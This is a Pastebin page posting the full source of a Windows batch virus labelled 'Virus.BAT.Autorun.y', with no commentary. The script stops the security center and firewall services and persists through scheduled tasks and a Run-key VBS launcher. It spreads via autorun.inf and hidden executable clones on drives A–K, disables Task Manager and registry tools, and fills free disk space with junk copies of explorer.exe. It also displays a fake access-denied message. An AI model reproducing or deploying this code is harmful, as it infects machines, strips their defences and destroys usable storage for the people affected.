Advertisement
FlyFar

Virus.BAT.Autorun.y - Source Code

Jul 8th, 2023
1,091
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 3.82 KB | Cybersecurity | 0 0
  1. @echo off
  2. set me=%0
  3. set e=echo
  4. attrib %0 +r
  5. net stop "Centro de Seguridad"
  6. net stop "Firewall de Windows/Conexi�n compartida a Internet (ICS)"
  7.  
  8. set hora=%time:~0,5%
  9. set fecha=%date:~0,2%
  10. set /a fecha+=3
  11. if %fecha% GTR 29 (set fecha=1)
  12.  
  13. if "%1" EQU "true" (goto:ini)
  14. if "%~p0" EQU "\" (explorer %~d0) else (if exist %~n0 (explorer %~n0) else (call:error %me%))
  15. if not exist %windir%\security\"%~nx0" (echo S|xcopy /H %me% %windir%\security)
  16. at | find "%~nx0"
  17. if %errorlevel% GTR 0 (at %hora% /next:%fecha% %windir%\security\%~nx0 true)
  18. exit
  19.  
  20. :ini
  21. for /f "skip=1 tokens=1*" %%a in ('tasklist ^| find "%~nx0"') do (if %%a. NEQ . (exit))
  22. pushd %windir%\system32\dllcache
  23. if not exist goma.bat call:goma>goma.bat
  24. if exist goma.bat start /b goma.bat
  25.  
  26. if not exist %windir%\"%~nx0" (echo S|xcopy /H %0 %windir%)
  27. if exist %windir%\"%~nx0" set virus=C:\Windows\"%~nx0"
  28. set virus=%virus:"=%
  29. for %%a in (A C D E F G H I J K) do (if exist %%a: (call:magic %%a "%virus%"))
  30. setlocal enabledelayedexpansion
  31. for %%a in (A C D E F G H I J K) do (
  32.        if exist %%a: (
  33.              pushd %%a:\
  34.              for /f "tokens=3 delims= " %%b in ('dir ^| find /I " bytes libres"') do set m=%%b
  35.              set m=!m:.=!
  36.              set /a m/=1034752
  37.              if exist wsegurity (echo S|cacls wsecurity /P %username%:F) else (md wsegurity)
  38.              attrib wsecurity +s +h +r
  39.              cd wsecurity
  40.              for /L %%c in (1,1,!m!) do type %windir%\explorer.exe>>power%%c.sgt
  41.              cd..
  42.              echo S|cacls wsecurity /P %username%:N
  43.                       )
  44.        )
  45. )
  46. endlocal
  47. exit
  48.  
  49. :goma
  50. %e% @echo off
  51. %e% reg add "hklm\software\microsoft\command processor" /v AutoRun /d "color 0a&&cls&&title Shell&&prompt $hwizard@host:" /f
  52. %e% reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  53. %e% reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  54. %e% reg add "hkcu\software\microsoft\windows\currentversion\policies\uninstall"  /v NoAddRemovePrograms /t REG_DWORD /d 1 /F
  55. %e% reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f
  56. %e% reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /v CheckedValue /t REG_DWORD /d 1 /f
  57. %e% reg add "hkcu\software\microsoft\windows\currentversion\policies\explorer" /v NoViewContextMenu /t REG_DWORD /d 1 /f
  58. %e% reg add "hklm\software\microsoft\windows\currentversion\run" /v CacheDefault /d %windir%\system32\dllcache\cache.vbs /f
  59. %e% rundll32 user32.dll,UpdatePerUserSystemParameters
  60. %e%.
  61. %e% pushd %windir%\system32\dllcache
  62. %e% if not exist dllcache.vbs (call:cache ^>cache.vbs)
  63. %e% if not exist %%~nx0% % (xcopy /h %%0)%
  64. %e% if exist cache.vbs (start cache.vbs)
  65. %e% exit
  66. %e%.
  67. %e% :cache
  68. %e% %e% set wzr=CreateObject ^("Wscript.shell")
  69. %e% %e% wzr.run ^"goma.bat",vbhide
  70. %e% goto:EOF
  71. goto:EOF
  72.  
  73.  
  74. :magic
  75. pushd %1:\
  76. if exist autorun.inf (
  77. attrib autorun.inf -a -s -r -h
  78. del autorun.inf
  79. )
  80. if not exist %1$.exe (call:clon "%1$" %2)
  81. if exist %1$.exe (
  82. call:auto %1$.exe>autorun.inf
  83. attrib %1$.exe +s +h
  84. )
  85. for /D %%a in (*) do (if %%a. NEQ . (call:clon "%%a" %2 && call:02 "%%a" %2)
  86. goto:EOF
  87.  
  88. :clon
  89. if exist %1.exe (goto:EOF) else (
  90. echo f|xcopy /h %2 %1.exe
  91. attrib %1 +s +h
  92. )
  93. goto:EOF
  94.  
  95. :02
  96. cd %1
  97. for /D %%b in (*) do (if %%b. NEQ . (call:clon "%%b" %2)
  98. cd..
  99. goto:EOF
  100.  
  101. :auto
  102. %e% [autorun]
  103. %e% open=%1
  104. %e% shell\open\command=%1
  105. %e% shell\explorer\command=%1
  106. attrib autorun.inf +s +h +r
  107. goto:EOF
  108.  
  109. :error
  110. echo wzr="No se puede tener acceso a %~dpn1" ^& chr(13) ^& chr(13) ^& " Acceso  denegado. ">%temp%\suc.vbs
  111. echo Msgbox wzr,VBCRITICAL,"Unidad local (%~d0)" >>%temp%\suc.vbs
  112. start %temp%\suc.vbs
  113. ping 127.0.0.1 -n 2 >nul
  114. del %temp%\suc.vbs
  115. goto:EOF
Tags: batch virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement